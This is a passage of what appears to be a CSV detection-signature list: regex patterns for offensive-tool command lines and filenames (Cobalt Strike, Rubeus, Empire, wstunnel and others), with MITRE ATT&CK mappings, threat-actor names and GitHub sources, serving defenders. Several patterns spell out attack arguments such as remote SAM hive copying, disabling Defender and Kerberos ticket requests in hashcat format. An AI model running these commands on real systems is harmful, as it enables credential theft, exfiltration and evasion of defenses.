Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ReadFromLsass*",".{0,1000}\sReadFromLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* ReadPEInMemory.exe*",".{0,1000}\sReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense 
Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* realvnc-auth-bypass.nse*",".{0,1000}\srealvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rec2 crde_linux*",".{0,1000}\srec2\scrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rec2 crde_macos*",".{0,1000}\srec2\scrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* received ACK from backdoor*",".{0,1000}\sreceived\sACK\sfrom\sbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 
- TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*----------------- Recon & Enumeration Modules -----------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sRecon\s\&\sEnumeration\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* Redirect Url After Stealing ==> *",".{0,1000}\sRedirect\sUrl\sAfter\sStealing\s\=\=\>\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* redis-brute.nse*",".{0,1000}\sredis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redis-info.nse*",".{0,1000}\sredis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redpill.ps1*",".{0,1000}\sredpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* redsocks.sh*",".{0,1000}\sredsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "* --reflective-injection *",".{0,1000}\s\-\-reflective\-injection\s.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "* reg_hive_sam.py*",".{0,1000}\sreg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - 
T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* reg_hive_security.py*",".{0,1000}\sreg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* reg_hive_system.py*",".{0,1000}\sreg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* reg_recover-rs.exe*",".{0,1000}\sreg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* RegisterEventSourceW(L""DESKTOP-...""* L""1337*",".{0,1000}\sRegisterEventSourceW\(L\""DESKTOP\-\.\.\.\"".{0,1000}\sL\""1337.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "* -Registry -AtStartup *",".{0,1000}\s\-Registry\s\-AtStartup\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -relayserver *:5555*",".{0,1000}\s\-relayserver\s.{0,1000}\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "* -remote -bindPipe * -bindPort * -security*",".{0,1000}\s\-remote\s\-bindPipe\s.{0,1000}\s\s\-bindPort\s.{0,1000}\s\-security.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "* -Remote -ExchHostname *",".{0,1000}\s\-Remote\s\-ExchHostname\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "* -Remote_Posh -Location *.ps1 -Function Invoke-* -ComputerName *",".{0,1000}\s\-Remote_Posh\s\-Location\s.{0,1000}\.ps1\s\-Function\sInvoke\-.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "* RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\sRemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* -RemoteDllHandle *",".{0,1000}\s\-RemoteDllHandle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -remotefilepath *\\*.wav*",".{0,1000}\s\-remotefilepath\s.{0,1000}\\\\.{0,1000}\.wav.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "* RemoteHashRetrieval.ps1*",".{0,1000}\sRemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --remote-impersonation*",".{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*",".{0,1000}\s\-RemotePath\s.{0,1000}\\Windows\\System32\\SAM\s\-LocalPath\s.{0,1000}\\tmp\\.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "* RemotePotato0.zip*",".{0,1000}\sRemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* --remote-to-local socks://*",".{0,1000}\s\-\-remote\-to\-local\ssocks\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --remote-to-local 
tcp://*",".{0,1000}\s\-\-remote\-to\-local\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --remote-to-local udp://*",".{0,1000}\s\-\-remote\-to\-local\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*",".{0,1000}\sremove\sdevice\sGUID\:001B2EE1\-AE95\-4146\-AE7B\-5928F1E4F396.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true*",".{0,1000}\s\-RemoveDefinitions\s\-All\sSet\-MpPreference\s\-DisableIOAVProtection\s\$true.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* renew *.kirbi*",".{0,1000}\srenew\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* renew */ticket:*",".{0,1000}\srenew\s.{0,1000}\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* repo -u https://github.com/*",".{0,1000}\srepo\s\-u\shttps\:\/\/github\.com\/.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "* -Report PrivescCheck_*",".{0,1000}\s\-Report\sPrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "* req -username * -p * -ca * -target * -template * -upn *",".{0,1000}\sreq\s\-username\s.{0,1000}\s\-p\s.{0,1000}\s\-ca\s.{0,1000}\s\-target\s.{0,1000}\s\-template\s.{0,1000}\s\-upn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -request -dc-ip *",".{0,1000}\s\-request\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -request -format hashcat -outputfile *",".{0,1000}\s\-request\s\-format\shashcat\s\-outputfile\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* request_shellcode.exe*",".{0,1000}\srequest_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --requirement *Exegol/requirements.txt*",".{0,1000}\s\-\-requirement\s.{0,1000}Exegol\/requirements\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* resolveall.nse*",".{0,1000}\sresolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* restart dnscrypt-proxy*",".{0,1000}\srestart\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "* restoresig.py*",".{0,1000}\srestoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "* --restrict-to localhost:* wss://*",".{0,1000}\s\-\-restrict\-to\slocalhost\:.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* resu ten*",".{0,1000}\sresu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed 
